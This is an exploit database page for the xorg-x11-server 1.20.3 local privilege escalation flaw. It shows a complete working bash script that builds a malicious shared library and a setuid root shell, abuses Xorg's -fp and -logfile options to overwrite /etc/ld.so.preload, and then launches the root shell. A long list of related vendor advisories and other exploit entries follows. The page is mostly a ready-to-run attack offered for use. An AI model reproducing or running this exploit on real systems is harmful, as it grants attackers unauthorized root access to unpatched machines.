Lucene search
Infodox1337DAY-ID-31437HistoryOct 26, 2018 - 12:00 a.m.
xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit (2)
2018-10-2600:00:00
infodox
0day.today
58
0.024 Low
EPSS
Percentile
88.7%
Exploit for multiple platform in category local exploits
xorg-x11-server Local Privilege Escalation (2)
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Hack the planet!"
cd /etc; Xorg -fp "/tmp/libhax.so" -logfile ld.so.preload :1;
mount # arbritary setuid we run to pop root
echo "[+] Tidy up a bit..."
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell
# 0day.today [2018-10-26] #Related
nessus
nessus
NewStart CGSL CORE 5.04 / MAIN 5.04 : xorg-x11-server Vulnerability (NS-SA-2019-0045)
2019-08-12 00:00:00
AIX 5.3 TL 12 : xorg (IJ11551)
2018-12-13 00:00:00
RHEL 7 : xorg-x11-server (RHSA-2018:3410)
2018-10-31 00:00:00
suse
suse
Security update for xorg-x11-server (moderate)
2018-11-17 00:12:28
packetstorm
packetstorm
xorg-x11-server 1.20.3 Privilege Escalation
2018-10-31 00:00:00
Xorg X11 Server Local Privilege Escalation
2019-11-12 00:00:00
xorg-x11-server Local Privilege Escalation
2018-10-25 00:00:00
zdt
zdt
Xorg X11 Server SUID modulepath Privilege Escalation Exploit
2019-10-22 00:00:00
Xorg X11 Server Local Privilege Escalation Exploit
2019-11-13 00:00:00
exploitpack
exploitpack
xorg-x11-server 1.20.3 - Local Privilege Escalation
2018-10-25 00:00:00
xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation
2019-01-14 00:00:00
xorg-x11-server 1.20.3 - Privilege Escalation
2018-10-30 00:00:00
metasploit
metasploit
Xorg X11 Server Local Privilege Escalation
2019-02-06 11:42:40
Xorg X11 Server SUID modulepath Privilege Escalation
2018-11-25 21:54:37
Xorg X11 Server SUID logfile Privilege Escalation
2018-11-11 07:43:36
kitploit
kitploit
Emp3R0R - Linux Post-Exploitation Framework Made By Linux User
2021-01-09 11:30:00
openvas
openvas
Debian: Security Advisory (DSA-4328-1)
2018-10-24 00:00:00
SUSE: Security Advisory (SUSE-SU-2018:3680-1)
2021-06-09 00:00:00
Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2553)
2020-01-23 00:00:00
avleonov
avleonov
What is a vulnerability and what is not?
2019-01-28 09:41:51
fedora
fedora
[SECURITY] Fedora 28 Update: xorg-x11-server-1.19.6-10.fc28
2018-11-08 02:20:52
[SECURITY] Fedora 29 Update: xorg-x11-server-1.20.3-1.fc29
2018-11-05 02:01:32
centos
centos
xorg security update
2018-11-15 19:12:13
debiancve
debiancve
CVE-2018-14665
2018-10-25 20:29:00
thn
thn
New Privilege Escalation Flaw Affects Most Linux Distributions
2018-10-26 13:58:00
redhatcve
redhatcve
CVE-2018-14665
2018-10-25 14:51:04
redhat
redhat
(RHSA-2018:3410) Important: xorg-x11-server security update
2018-10-30 14:57:30
alpinelinux
alpinelinux
CVE-2018-14665
2018-10-25 20:29:00
veracode
veracode
Arbitrary Code Execution
2019-01-15 09:25:46
oraclelinux
oraclelinux
xorg-x11-server security update
2018-11-07 00:00:00
Xorg security and bug fix update
2019-08-13 00:00:00
ibm
ibm
f5
f5
K03073656 : X.Org X server vulnerability CVE-2018-14665
2018-11-23 00:00:00
prion
prion
Code injection
2018-10-25 20:29:00
osv
osv
xorg-server - security update
2018-10-25 00:00:00
CVE-2018-14665
2018-10-25 20:29:00
debian
debian
[SECURITY] [DSA 4328-1] xorg-server security update
2018-10-25 21:31:28
mageia
mageia
Updated x11-server packages fix security vulnerability
2018-10-27 12:45:46
archlinux
archlinux
[ASA-201810-15] xorg-server: privilege escalation
2018-10-29 00:00:00
threatpost
threatpost
X.Org Flaw Allows Privilege Escalation in Linux Systems
2018-10-29 16:13:26
cve
cve
CVE-2018-14665
2018-10-25 20:29:00
ubuntu
ubuntu
X.Org X server vulnerability
2018-10-26 00:00:00
ubuntucve
ubuntucve
CVE-2018-14665
2018-10-25 00:00:00
gentoo
gentoo
X.Org X Server: Privilege escalation
2018-10-30 00:00:00
aix
aix
exploitdb
exploitdb
xorg-x11-server < 1.20.1 - Local Privilege Escalation
2018-11-13 00:00:00
xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation
2019-01-14 00:00:00
Xorg X11 Server - Local Privilege Escalation (Metasploit)
2019-11-20 00:00:00